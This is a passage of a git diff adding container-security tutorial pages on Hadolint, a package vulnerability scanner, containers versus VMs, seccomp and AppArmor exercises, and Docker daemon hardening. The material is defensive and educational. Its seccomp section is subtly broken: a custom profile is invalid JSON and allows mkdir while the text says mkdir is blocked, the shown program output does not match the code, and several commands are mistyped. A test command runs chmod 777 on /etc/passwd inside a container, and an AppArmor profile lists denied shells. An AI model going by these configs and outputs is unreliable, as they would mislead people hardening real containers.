"ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } + +\] } + +``` + +Check it out YaraHunter and support this project by giving gitstar ! + +[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=deepfence&repo=YaraHunter)](https://github.com/deepfence/YaraHunter) + + diff --git a/content/en/containersecurity/b18.Security-linting-dockerfile 2.md b/content/en/containersecurity/b18.Security-linting-dockerfile 2.md new file mode 100644 index 0000000..36911d9 --- /dev/null +++ b/content/en/containersecurity/b18.Security-linting-dockerfile 2.md @@ -0,0 +1,130 @@ +--- +title: "Security Linting of Dockerfiles" +description: " hadolint " +slug: "Security-linting-of-dockerfiles" +--- + + +# hadolint + +Hadolint comes with a robust and easy to use CLI. You can install it on a variety of platforms, including macOS using `brew install hadolint`. + +Confirm the installation was successful with the following command: + +``` + +$ hadolint --help +hadolint - Dockerfile Linter written in Haskell + +``` +We’ll use the following Dockerfile as an example, which can be used to run a Python Django web server. On the surface, it looks fine but we’ll see it has a lot of problems. + +```Dockerfile +FROM python +MAINTAINER xyx +LABEL org.website="xyz" + +RUN mkdir app && cd app + +COPY requirements.txt ./ +RUN pip install --upgrade pip +RUN pip install -r requirements.txt + +COPY . . 
+ +CMD python manage.py runserver 0.0.0.0:80000 + + +``` + +Let’s run it through Hadolint: + +```bsh + +$ hadolint Dockerfile +Dockerfile:1 DL3006 warning: Always tag the version of an image explicitly +Dockerfile:1 DL3049 info: Label `maintainer` is missing. +Dockerfile:2 DL4000 error: MAINTAINER is deprecated +Dockerfile:3 DL3052 warning: Label `org.website` is not a valid URL. +Dockerfile:5 DL3003 warning: Use WORKDIR to switch to a directory +Dockerfile:5 SC2164 warning: Use 'cd ... || exit' or 'cd ... || return' in case cd fails. +Dockerfile:7 DL3045 warning: `COPY` to a relative destination without `WORKDIR` set. +Dockerfile:8 DL3013 warning: Pin versions in pip. Instead of `pip install ` use `pip install ==` or `pip install --requirement ` +Dockerfile:8 DL3042 warning: Avoid use of cache directory with pip. Use `pip install --no-cache-dir ` +Dockerfile:9 DL3059 info: Multiple consecutive `RUN` instructions. Consider consolidation. +Dockerfile:9 DL3042 warning: Avoid use of cache directory with pip. Use `pip install --no-cache-dir ` +Dockerfile:11 DL3045 warning: `COPY` to a relative destination without `WORKDIR` set. +Dockerfile:13 DL3025 warning: Use arguments JSON notation for CMD and ENTRYPOINT arguments + +``` + +Every violation takes on the following structure: + +A rule code is prefixed with either DL or SC. The DL prefix means the rule comes from Hadolint directly. The SC prefix means the rule comes from [SpellCheck](https://github.com/koalaman/shellcheck) which is a static analysis tool for shell scripts that comes with Hadolint out of the box. You can find the combined list of rules [here](https://github.com/hadolint/hadolint#rules). + +Every rule has a dedicated documentation page that lists code examples, rationale and other important details. See the dedicated page for [DL3006](https://github.com/hadolint/hadolint/wiki/DL3006) here. + +You can ignore one or more rules using the `--ignore RULECODE` option: + +```bash +$ hadolint --ignore DL3013 --ignore DL3042 Dockerfile + +``` +You can also ignore rules within the Dockerfile inline. I prefer this approach because you can exclude rule codes on a per-line basis and it’s more clear where the violation is actually happening. + +```bash +# hadolint ignore=DL3013 +RUN pip install --upgrade pip +``` + +Hadolint has an active open-source community. New rule codes are added on a regular basis so be sure to check you’re running the latest version of Hadolint every so often. + +# Severity level + + +The severity level indicates how critical a violation is. There are six levels: error, warning, info, style, ignore, and none. + +The CLI includes a --failure-threshold (abbreviated as -t) to exclude certain severity levels from causing a failure. For example, if you only want Hadolint to fail on error violations. + +```bash +$ hadolint -t error Dockerfile + +``` +Note, violations from other severity levels will still be reported but they won’t cause a failure. + +If you don’t agree with a rule code’s severity level, you can easily change it using the -- RULECODE option. For example, the following command upgrades DL3006 to error and downgrades DL3045 to info (both codes are warning by default): + +```bash +$ hadolint --error DL3006 --info DL3045 Dockerfile +Dockerfile:1 DL3006 error: Always tag the version of an image explicitly +Dockerfile:7 DL3045 info: `COPY` to a relative destination without `WORKDIR` set. 
+ +``` + +# Fix the Dockerfile + +Working through each error one-by-one is a fantastic exercise for learning about Dockerfile best practices. As mentioned above, every rule has a very clear and detailed documentation page. Give it a shot and revisit this post when you’re done. + +At this point, Hadolint should report no errors. Your file should look similar to this: + +```bash +FROM python:3.10 +LABEL maintainer="xyz" +LABEL org.website="xyz" +WORKDIR /app +COPY requirements.txt ./ +# hadolint ignore=DL3013 +RUN pip install --upgrade --no-cache-dir pip && \ + pip install --no-cache-dir -r requirements.txt +COPY . . +CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"] + +``` + +- Integrations + +Hadolint includes many convenient integrations for automatically running the linter throughout the development process. My favorites are: + +[VS Code](https://github.com/hadolint/hadolint/blob/master/docs/INTEGRATION.md#vs-code): run Hadolint directly in your editor +[pre-commit](https://github.com/hadolint/hadolint/blob/master/docs/INTEGRATION.md#pre-commit): run Hadolint on every git commit +[GitHub Actions](https://github.com/hadolint/hadolint/blob/master/docs/INTEGRATION.md#github-actions): run Hadolint in GitHub CI/CD diff --git a/content/en/containersecurity/b19.packetscanner 2.md b/content/en/containersecurity/b19.packetscanner 2.md new file mode 100644 index 0000000..1c76040 --- /dev/null +++ b/content/en/containersecurity/b19.packetscanner 2.md @@ -0,0 +1,195 @@ +--- +title: "Static Analysis of container images library for container " +description: " Packetstreamer " +slug: "Static Analysis of container images library for container" +--- + +# Packetstreamer + +SBOM and vulnerability scanner for container images + + +https://github.com/deepfence/package-scanner + + +Download binary + +- package-scanner_Darwin_arm64.tar.gz +- package-scanner_Darwin_x86_64.tar.gz +- package-scanner_Linux_arm64.tar.gz +- package-scanner_Linux_x86_64.tar.gz +- package-scanner_darwin_amd64_v1 +- package-scanner_darwin_arm64 +- package-scanner_linux_amd64_v1 +- package-scanner_linux_arm64 + + +ClI usage + +scan a docker image for vulnerabilities + +``` bash +./package-scannner -source nginx:latest +``` + +Scan a docker images , filter for critical vulnerabilities + +```bash +./package-scanner -source nginx:latest -severity critical +``` + +Scan a docker images with CVEs + + + + +```bash +./package-scanner -source nginx:latest +INFO[2023-01-06T15:10:15+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///var/run/docker.sock' with timeout '10s' +INFO[2023-01-06T15:10:15+05:30] autodetect.go:116 connected successfully using endpoint: unix:///var/run/docker.sock +INFO[2023-01-06T15:10:15+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///run/containerd/containerd.sock' with timeout '10s' +WARN[2023-01-06T15:10:25+05:30] autodetect.go:124 could not connect to endpoint 'unix:///run/containerd/containerd.sock': context deadline exceeded +INFO[2023-01-06T15:10:25+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///run/k3s/containerd/containerd.sock' with timeout '10s' +WARN[2023-01-06T15:10:35+05:30] autodetect.go:124 could not connect to endpoint 'unix:///run/k3s/containerd/containerd.sock': context deadline exceeded +INFO[2023-01-06T15:10:35+05:30] autodetect.go:91 trying to connect to endpoint 'unix:///var/run/crio/crio.sock' with timeout '10s' +WARN[2023-01-06T15:10:35+05:30] autodetect.go:146 could not connect to endpoint 'unix:///var/run/crio/crio.sock': dial unix 
/var/run/crio/crio.sock: connect: no such file or directory +INFO[2023-01-06T15:10:35+05:30] autodetect.go:184 container runtime detected: docker +INFO[2023-01-06T15:10:35+05:30] run-once.go:57 generating sbom for nginx:latest ... +INFO[2023-01-06T15:10:49+05:30] run-once.go:82 scanning sbom for vulnerabilities ... +summary: + total=142 critical=8 high=42 medium=79 low=13 ++------------------+-----------------+-------------------------------------+----------------------------------------------------+ +| CVE ID | SEVERITY | PACKAGE | DESCRIPTION | ++------------------+-----------------+-------------------------------------+----------------------------------------------------+ +| CVE-2019-1010022 | critical | libc-bin:2.31-13+deb11u5 | ** DISPUTED ** GNU Libc | +| | | | current is affected by: | +| | | | Mitigation bypass. The impact | +| | | | is: Attacker may bypass | +| | | | stack guard protection. The | +| | | | component is: nptl. The attack | +| | | | vector is: Exploit stack | +| | | | buffer overflow vulnerability | +| | | | and use this bypass | +| | | | vulnerability to bypass stack | +| | | | guard. NOTE: Upstream comments | +| | | | indicate "this is being | +| | | | treated as a non-security bug | +| | | | and no real threat." | +| CVE-2019-1010022 | critical | libc6:2.31-13+deb11u5 | ** DISPUTED ** GNU Libc | +| | | | current is affected by: | +| | | | Mitigation bypass. The impact | +| | | | is: Attacker may bypass | +| | | | stack guard protection. The | +| | | | component is: nptl. The attack | +| | | | vector is: Exploit stack | +| | | | buffer overflow vulnerability | +| | | | and use this bypass | +| | | | vulnerability to bypass stack | +| | | | guard. NOTE: Upstream comments | +| | | | indicate "this is being | +| | | | treated as a non-security bug | +| | | | and no real threat." | +| CVE-2017-9117 | critical | libtiff5:4.2.0-1+deb11u1 | In LibTIFF 4.0.7, the | +| | | | program processes BMP images | +| | | | without verifying that | +| | | | biWidth and biHeight in the | +| | | | bitmap-information header | +| | | | match the actual input, | +| | | | leading to a heap-based buffer | +| | | | over-read in bmp2tiff. | +| CVE-2019-8457 | critical | libdb5.3:5.3.28+dfsg1-0.8 | SQLite3 from 3.6.0 to and | +| | | | including 3.27.2 is vulnerable | +| | | | to heap out-of-bound read in | +| | | | the rtreenode() function when | +| | | | handling invalid rtree tables. | +| CVE-2005-2541 | critical | tar:1.34+dfsg-1 | Tar 1.15.1 does not properly | +| | | | warn the user when extracting | +| | | | setuid or setgid files, | +| | | | which may allow local users | +| | | | or remote attackers to gain | +| | | | privileges. | +| CVE-2022-3970 | critical | libtiff5:4.2.0-1+deb11u1 | A vulnerability was found in LibTIFF. | +| | | | It has been classified as critical. This | +| | | | affects the function TIFFReadRGBATileExt | +| | | | of the file libtiff/tif_getimage.c. | +| | | | The manipulation leads to integer | +| | | | overflow. It is possible to initiate | +| | | | the attack remotely. The exploit has | +| | | | been disclosed to the public and may | +| | | | be used. The name of the patch is | +| | | | 227500897dfb07fb7d27f7aa570050e62617e3be. | +| | | | It is recommended to apply a patch to fix | +| | | | this issue. The identifier VDB-213549 was | +| | | | assigned to this vulnerability. 
| +| CVE-2022-32221 | critical | libcurl4:7.74.0-1.3+deb11u3 | When doing HTTP(S) transfers, | +| | | | libcurl might erroneously | +| | | | use the read callback | +| | | | (`CURLOPT_READFUNCTION`) to | +| | | | ask for data to send, even | +| | | | when the `CURLOPT_POSTFIELDS` | +| | | | option has been set, if the | +| | | | same handle previously was | +| | | | used to issue a `PUT` request | +| | | | which used that callback. | +| | | | This flaw may surprise the | +| | | | application and cause it to | +| | | | misbehave and either send off | +| | | | the wrong data or use memory | +| | | | after free or similar in the | +| | | | subsequent `POST` request. The | +| | | | problem exists in the logic | +| | | | for a reused handle when it is | +| | | | changed from a PUT to a POST. | +| CVE-2022-32221 | critical | curl:7.74.0-1.3+deb11u3 | When doing HTTP(S) transfers, | +| | | | libcurl might erroneously | +| | | | use the read callback | +| | | | (`CURLOPT_READFUNCTION`) to | +| | | | ask for data to send, even | +| | | | when the `CURLOPT_POSTFIELDS` | +| | | | option has been set, if the | +| | | | same handle previously was | +| | | | used to issue a `PUT` request | +| | | | which used that callback. | +| | | | This flaw may surprise the | +| | | | application and cause it to | +| | | | misbehave and either send off | +| | | | the wrong data or use memory | +| | | | after free or similar in the | +| | | | subsequent `POST` request. The | +| | | | problem exists in the logic | +| | | | for a reused handle when it is | +| | | | changed from a PUT to a POST. | +| CVE-2021-33560 | high | libgcrypt20:1.8.7-6 | Libgcrypt before 1.8.8 and | +| | | | 1.9.x before 1.9.3 mishandles | +| | | | ElGamal encryption because | +| | | | it lacks exponent blinding | +| | | | to address a side-channel | +| | | | attack against mpi_powm, | +| | | | and the window size is not | +| | | | chosen appropriately. This, | +| | | | for example, affects use of | +| | | | ElGamal in OpenPGP. | +| CVE-2019-20838 | high | libpcre3:2:8.39-13 | libpcre in PCRE before 8.43 | +| | | | allows a subject buffer | +| | | | over-read in JIT when UTF | +| | | | is disabled, and \X or \R | +| | | | has more than one fixed | +| | | | quantifier, a related issue to | +| | | | CVE-2019-20454. | +| CVE-2022-29458 | high | ncurses-base:6.2+20201114-2 | ncurses 6.3 before patch | +| | | | 20220416 has an out-of-bounds | +| | | | read and segmentation | +| | | | violation in convert_strings | +| | | | in tinfo/read_entry.c in the | + + + + + +``` + +## docker image standlone scanner + +```bash +docker run --rm -v /var/run/docker.sock:/var/run/docker.sock sangam14/package-scanner:latest -source nginx:latest +``` diff --git a/content/en/containersecurity/b2.containervsVM 2.md b/content/en/containersecurity/b2.containervsVM 2.md new file mode 100644 index 0000000..34939b6 --- /dev/null +++ b/content/en/containersecurity/b2.containervsVM 2.md @@ -0,0 +1,71 @@ +--- +title: "Container vs Virtualization" +description: "The introduction to this course." 
+slug: "Container-vs-Virtualization" +--- + +### A Shift from Monolithic to Microservice Architecture + +## Monolithic + +Application have changed dramarically +- A Decade Ago ( and still valid ) + - Apps were monolithic + - Built on single stack such as .NET or Java + - Long Lived + - Deployed to a single server + +Benefits of monolith - Simple to Develop , Test , Deplot & Scale + - simple to develope because of all the tools and IDEs aupport to that kind of application by default + - easy to deploy because all coponets are packed into one bundle + - Easy to scale the whole application + +Disadvantages of monolith + - Very difficult to maintain + - One Component failure will cause the whole system to fail + - Very difficult to understand and create the patches for monolithic applications + - Take a long time to startup because all the components need to get started + +## Microservice + +Today + - Apps are constantly developed + - Build from losely coupled components + - New version are deployed often + - Deployed to a multitude of server + + +## shipping code is damm too hard + +an efforts to solve complet problem + +![](./images/solve-problem.png) + +## every possible good to ship X every possible way to ship + +![](./images/pssiblewaytoship.png) + +## Enter ... Internodal container + +![](./images/intermodl-container.png) + + +## Thats what Docker all about +![](./images/whatdocker.png) + + + +## Comparing Docker vs VM + +| Virtual Machine | Docker | +|-|-| +| each VM runs its own os | Container is just a user space of OS | +| Boot up time os in minutes | Containers instantiate in seconds | +| VMs snapshots are used sparingly | Images are built incrementaly on top of another layers . lot of images /snapshots | +| Not effective diffs . No versiob controlled | Images can be version controlled docker hub is like GITHUB | +| Cannot run more than couple of VMs on an aveage laptop | Can run many docker containers in a laptop | +| Only one VM can be stated from one set of VMX and VMDK file | Multiple Docker Containers can be started from one Docker images | + + + + diff --git a/content/en/containersecurity/b20.SecComp-AppArmor 2.md b/content/en/containersecurity/b20.SecComp-AppArmor 2.md new file mode 100644 index 0000000..a4d47f5 --- /dev/null +++ b/content/en/containersecurity/b20.SecComp-AppArmor 2.md @@ -0,0 +1,604 @@ +--- +title: "Docker host security configurations" +slug: "Docker-host-security-configurations" +--- + +## SecComp and AppArmor + +Docker works with major Linux MAC technologies such as AppArmor and SELinux. + +Depending on your Linux distribution, Docker applies a default AppArmor profile to all new containers. According to the Docker documentation, this default profile is β€œmoderately protective while providing wide application compatibility”. + +Docker also lets you start containers without a policy applied, as well as giving you the ability to customize policies to meet specific requirements. This is also very powerful, but can also be prohibitively complex. + +## seccomp + +Docker uses seccomp, in filter mode, to limit the syscalls a container can make to the host’s kernel. + +As per the Docker security philosophy, all new containers get a default seccomp profile configured with sensible defaults. This is intended to provide moderate security without impacting application compatibility. + +![](./images/seccomp.png) + +As always, you can customize seccomp profiles, and you can pass a flag to Docker so that containers can be started without a seccomp profile. 

As with many of the technologies already mentioned, seccomp is extremely powerful. However, the Linux syscall table is long, and configuring the appropriate seccomp policies can be prohibitively complex.

# Concluding Linux security technologies

Docker supports most of the important Linux security technologies and ships with sensible defaults that add security but aren't too restrictive. The figure below shows how these technologies form multiple layers of potential security.

Some of these technologies can be complicated to customize as they require deep knowledge of how the Linux kernel works. Hopefully, they will get simpler to configure in the future, but for now, the default configurations that ship with Docker are a good place to start.



## SecComp Exercise 1

First, check that seccomp support is compiled into the kernel:

```bash
grep SECCOMP /boot/config-$(uname -r)
```

The first test is for seccomp in strict mode. Create `seccomp_strict.c`:

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/prctl.h>
#include <linux/seccomp.h>


int main(int argc, char **argv)
{
    int output = open("output.txt", O_WRONLY);
    const char *val = "test";

    printf("Calling prctl() to set seccomp strict mode...\n");
    prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);

    printf("Writing to an already open file...\n");
    write(output, val, strlen(val)+1);

    printf("Trying to open file for reading...\n");
    int input = open("output.txt", O_RDONLY);

    printf("You will not see this message--the process will be killed first\n");
}
```

```bash
sudo gcc seccomp_strict.c -o seccomp_strict
./seccomp_strict
```

The open() system call is not allowed in seccomp strict mode, so the process is killed before the final message is printed.

Next, create `seccomp_bpf.c` to test seccomp in filter mode:

```c
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <seccomp.h>

void main(void)
{
    /* initialize the libseccomp context */
    scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);

    /* allow exiting */
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);

    /* allow getting the current pid */
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0);

    /* allow changing data segment size, as required by glibc */
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0);

    /* allow writing up to 512 bytes to fd 1 */
    seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2,
        SCMP_A0(SCMP_CMP_EQ, 1),
        SCMP_A2(SCMP_CMP_LE, 512));

    /* if writing to any other fd, return -EBADF */
    seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1,
        SCMP_A0(SCMP_CMP_NE, 1));

    /* load and enforce the filters */
    seccomp_load(ctx);
    seccomp_release(ctx);

    printf("this process is %d\n", getpid());
}

```

This time seccomp is initialized in filter mode through libseccomp; previously we used `prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);` to set seccomp to strict mode.

Compile it:

```bash
sudo gcc seccomp_bpf.c -o seccomp_bpf
```

If the build fails because `seccomp.h` is missing, install libseccomp-dev:

```bash
sudo apt-get install libseccomp-dev
```

Then compile again, linking against libseccomp, and run the binary:

```bash
sudo gcc seccomp_bpf.c -o seccomp_bpf -lseccomp
```

```bash
./seccomp_bpf
```

Output:

```bash
initiating seccomp ...
add rule to allow exit_group
add rule to allow getpid
add rule to allow brk
add rule to allow write upto 512 bytes to fd 1
add rule to allow write to any other fd except 1
loading seccomp filter ...

```

Inspecting the output, you can see each rule being added to the seccomp BPF filter, followed by the process ID, since we added a rule allowing the getpid() system call.
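
As a quick sanity check outside the program itself, the kernel reports the seccomp mode of any process in `/proc` (this assumes a kernel new enough to expose the field; 0 means disabled, 1 strict, 2 filter):

```bash
# Seccomp mode of the current shell (normally "Seccomp: 0")
grep Seccomp /proc/$$/status

# Seccomp mode of another process by PID (1234 is a placeholder)
grep Seccomp /proc/1234/status
```

The same check works for processes running inside containers, which makes it handy for verifying the Docker examples later in this section.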
+ + + +open seccomp_bpf.c and add the following code to the end of the file + + +```c +#include +#include +#include +#include +#include +#include + +/* "mov al,42; ret" aka "return 42" */ +static const unsigned char code[] = "\xb0\x2a\xc3"; + +void main(void) +{ + int fd[2], ret; + + /* spawn child process, connected by a pipe */ + pipe(fd); + if (fork() == 0) { + close(fd[0]); + + /* enter mode 1 seccomp and execute untrusted bytecode */ + prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); + ret = (*(uint8_t(*)())code)(); + + /* send result over pipe, and exit */ + write(fd[1], &ret, sizeof(ret)); + syscall(SYS_exit, 0); + } else { + close(fd[1]); + + /* read the result from the pipe, and print it */ + read(fd[0], &ret, sizeof(ret)); + printf("untrusted bytecode returned %d\n", ret); + } +} + +``` + +```bsh +$ suod gcc seccomp_bpf.c -o seccomp_bpf2 -lseccomp +$ ./seccomp_bpf2 +initiating seccomp ... +add rule to allow exit_group +add rule to allow getpid +add rule to allow brk +add rule to allow write upto 512 bytes to fd 1 +add rule to allow write to any other fd except 1 +loading seccomp filter ... +this process is -9 +``` + + +## seccomp in docker + +step 1. check the SECCOMP is working and configured in docker daemon + +```bash +docker info | grep seccomp +``` + +step 2. check the seccomp profile of the container + +```bash +docker inspect --format='{{json .HostConfig.SecurityOpt}}' +``` + +seccomp-profiles/deny.json + +```json +{ + "defaultAction": "SCMP_ACT_ERRNO", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls" : [ + + ] +} + +``` + +a docker seccomp profile consists of 3 required entries viz. defaultAction, architectures and syscalls. the possible action of precedence are + +* SCMP_ACT_KILL + - kill with am status of 0x80 + 31(SIGSYS) = 159 +* SCMP_ACT_TRAP + - send SIGSYS signal without executing the syscall +* SCMP_ACT_ERRNO + - set erno withou executing the syscall +* SCMP_ACT_TRACE + - invoke a ptrace to make a decision or set errno to Enosys +* SCMP_ACT_ALLOW + - allow the syscall to execute + +``` + +docker run --security-opt seccomp=seccomp-profiles/deny.json -it ubuntu bash +``` +using `--security-opt seccomp=seccomp-profiles/deny.json` we have set the seccomp profile to the container . +notice here that since not even single system call is allwoed , the docker container is not able to run . + + + +create sc-custom.json + +```json +{ + "defaultAction": "SCMP_ACT_ALLOW", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls" : [ + { + "names":"mkdir", + "action": "SCMP_ACT_ALLOW", + "args::[] + + }, + { + "names": "chmod" , + "action": "SCMP_ACT_ERRNO", + "args::[] + } + + ] +} + +``` + +before going to run this commands see what +all system call actally take place while hitting mkdir command inside an alphine +container using strace + +```bash +docker run -rm -it --security-opt seccomp=unconfined alphine sh +``` + +```bash +apk add strace +strace mkdir test +exit +``` + +we have installed strace utility inside the container and then run the mkdir command .the system call oberved include `execve ` , +`arch_prtctl` ` mprotect` `brk` `access` `openat` `mkdirat` `fstat` `close` `exit_group` . test directory is created inside the container . + + +Now run another contaiet with same aphine image with new `sc-custom.json` seccomp profile . 
+ +```bash +docker run -rm -it --security-opt seccomp=sc-custom.json alphine sh +``` + +```bash +ls +mkdir test +``` +mkdir: can't create directory 'test': Operation not permitted + +```bash +# chmod /etc/ +``` +clearly , the seccomp profile attavhed is blocking the mkdir and chmod system call . +lets comfirm it with strace utility agin + + +```bash +apk add strace +strace mkdir test +``` + +as expected the systm call got rejected with `Operation not permitted` error . since also we have added a deny condition for chmod system call . + +Run a docker container with the same seccomp file with chmpd over file 777 permission + +```bash +$ docker run -rm -it --security-opt seccomp=sc-custom.json alphine sh chmod 777 /etc/passwd +``` +this os also denyed by the seccomp profile . + +for more play with `default.json` seccomp +profile available on moby github repo + + + +## app armor + +appArmor is a MAC (Mandatory Access Control) system that is used to restrict the access of a process to the system resources . its implements a task centered policy with task +"profile" being created and loaded from user space + +tasks on the syste, that do not have profi;e defined for them run an uncofined state which is equivalant to standared Linux DAC (Discretionary Access Control) . permissions . + +appArmor works on file paths . it comes as default LSM for ubuntu and SUSE . + +1. let check our dpcler version and service status + +```bash + +$ docker version +$ systemctl status docker +``` + + + +2. check AppArmor in docker info + +```bash +docker info -f '{{json .SecurityOptions}}' +``` + +3. chheck AppArmor status . it might required sudo access + +```bash +$ apparmor_status +$ sudo apparmor_status +``` +this will provide us the infromation about all the profile loaded and the mode of profiles with process + +the apparmor_status and aa-status can used interchangeably . just check if they are available with your system installation or not gernerally they comes in package call +`apparmor-utils` . +```bash + +$ which apparmor_status +$ which aa-status +``` +and one can gain insight about the number of profile also + +```bash +$ sudp aa-status --help +$ sudo aa-status --enabled [No error output means apparmor is enabled] +$ sudo aa-status --profiles [prints the no of loaded policies ] +$ sudo aa-status --enforce [prints the no of enforced policies ] + +``` + +Install an AppArmor Profile generator tool called `bane` + +```bash +# Export the sha256sum for verification. +$ export BANE_SHA256="e70b1d67333975eb705b08045de9558483daae05792a1ff28dcec28d4c164386" + +# Download and check the sha256sum. +$ curl -fSL "https://github.com/genuinetools/bane/releases/download/v0.4.4/bane-freebsd-amd64" -o "/usr/local/bin/bane" \ + && echo "${BANE_SHA256} /usr/local/bin/bane" | sha256sum -c - \ + && chmod a+x "/usr/local/bin/bane" + +$ echo "bane installed!" + +# Run it! +$ bane -h +``` + +get the sample TOML file for creation of AppArmor profile from bane Github + + +```bash +$ sudo curl -o sample.toml https://raw.githubusercontent.com/genuinetools/bane/master/sample.toml +$ ls +``` +the parts of the sample.toml file are + +a. `name` key value pair is the name of the profile . + +``` +# name of the profile, we will auto prefix with `docker-` +# so the final profile name will be `docker-nginx-sample` +Name = "nginx-sample" + +``` + +b . `Filesystem ` table with different arrays like ReadOnlyPaths , LogOnWritePaths , WritePaths , ReadPaths , NoAccessPaths , ReadOnlyPaths . 
+ +```bash + +[Filesystem] +# read only paths for the container +ReadOnlyPaths = [ + "/bin/**", + "/boot/**", + "/dev/**", + "/etc/**", + "/home/**", + "/lib/**", + "/lib64/**", + "/media/**", + "/mnt/**", + "/opt/**", + "/proc/**", + "/root/**", + "/sbin/**", + "/srv/**", + "/tmp/**", + "/sys/**", + "/usr/**", +] + +# paths where you want to log on write +LogOnWritePaths = [ + "/**" +] + +# paths where you can write +WritablePaths = [ + "/var/run/nginx.pid" +] + +# allowed executable files for the container +AllowExec = [ + "/usr/sbin/nginx" +] + +# denied executable files +DenyExec = [ + "/bin/dash", + "/bin/sh", + "/usr/bin/top" +] + +``` + +C. Capabilties table allow array for allowing Linux capabilities . + +```toml +# allowed capabilities +[Capabilities] +Allow = [ + "chown", + "dac_override", + "setuid", + "setgid", + "net_bind_service" +] + + +``` + +D . Network table with Raw , Packet , Protocols array . + +```toml + +[Network] +# if you don't need to ping in a container, you can probably +# set Raw to false and deny network raw +Raw = false +Packet = false +Protocols = [ + "tcp", + "udp", + "icmp" +] + +``` + +build the sample file with bane and check apparmor status if this profile gets enforced + +```bash +$ sudo bane sample.toml +$ sudo aa-status | grep docker + +``` +notice that there was already loaded `docker-default` profile . + + +```bash +$ sudo ls /etc/apparmor.d/containers/ +docker-ngnix-sample +``` + +```bash +sudo cat /etc/apparmor.d/containers/docker-nginx-sample +``` + +```c + #include + + profile docker-nginx-sample flags=(attach_disconnected,mediate_deleted) { + #include + #include + #include + + /bin/** r, + /boot/** r, + /dev/** r, + /etc/** r, + /home/** r, + /lib/** r, + /lib64/** r, + /media/** r, + /mnt/** r, + /opt/** r, + /proc/** r, + /root/** r, + /sbin/** r, + /srv/** r, + /tmp/** r, + /sys/** r, + /usr/** r, + /var/run/nginx.pid rw, + /usr/sbin/nginx ix, + deny /bin/dash ix, + deny /bin/sh ix, + deny /usr/bin/top ix, + capability chown, + capability dac_override, + capability setuid, + capability setgid, + capability net_bind_service, + network raw, + network packet, + deny network raw, + deny network packet, + deny network tcp, + deny network udp, + deny network icmp, + } + + ..... + +``` + +Apply the above bane generated profile to the container before that lets +analyze some commands that we can perfectly run within a container not attached to this profile + + +```bash +$ docker run -it --rm --name without-aa -p 4444:80 nginx bash +# sh +# dash +# bash +# exit +# exist +``` +in this ngnix container we are able to run many variants of shell like bash sh and dash without any error + + +now attach th profile and try to achive the same + +```bash +$ docker run -it --rm --name with-aa --security-opt="apparmor:docker-nginx-sample" -p 4444:80 nginx bash +``` +As expected, the attached AppArmor profile is not allowing us to spawn shells inside the container. This is how an AppArmor profile can be attached to a Docker container using `--security-opt` and the different executables and capabilities can be controlled. Till now, we have seen that Docker uses many Linux technologies, such as Capabilities, AppArmor and SecComp for defense. However, AppArmor can protect a Docker Host even when the other lines of defense such as SecComp and Capabilities are not effective. Remember that if you are not explicitly defining any AppArmor profile, the `default-docker` AppArmor profile will get automatically attached. 
Until and unless `--security-opt apparmor=unconfined` is not present during the container run command execution `default-docker` + apparmor profile will be remain loaded . + + \ No newline at end of file diff --git a/content/en/containersecurity/b21.docker-daemon-sec 2.md b/content/en/containersecurity/b21.docker-daemon-sec 2.md new file mode 100644 index 0000000..1142cd0 --- /dev/null +++ b/content/en/containersecurity/b21.docker-daemon-sec 2.md @@ -0,0 +1,426 @@ +--- +title: "Docker Daemon security configurations" +slug: "Docker-Daemon-security-configurations" +--- + + + # docker daemon security configuration + + +Install docker CE 19.03 + +```bash + +# yum install -y yum-utils device-mapper-persistent-data lvm2 +# yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo + +# yum install -y docker-ce + +[root@localhost docker]# docker --version +Docker version 19.03.8, build afacb8b + +``` + + +# Daemon security configuration + +There is no configuration file by default, which needs to be created separately/etc/docker/daemon.json, the following configurations are all local test examples configured on this file. + + +```json +{ + "icc": false, + "log-level": "info", + "log-driver": "json-file", + "log-opts": { + "max-size": "10m", + "max-file":"5", + "labels": "somelabel", + "env": "os,customer" + }, + "iptables": true, + "userns-remap": "default", + "userland-proxy": false, + "experimental": false, + "selinux-enabled": true, + "live-restore": true, + "no-new-privileges": true, + "cgroup-parent": "/foobar", + "seccomp-profile": "/etc/docker/seccomp/default-no-chmod.json", + "tls": true, + "tlsverify": true, + "tlscacert": "/etc/docker/CA/ca.pem", + "tlscert": "/etc/docker/CA/server-cert.pem", + "tlskey": "/etc/docker/CA/server-key.pem" +} + + +``` + +# configure access to docker daemon through HTTPS and certificate authentication + +Server certificate + +Create a host and define a domain (IP can also be used). The corresponding certificate will be generated according to the domain. 
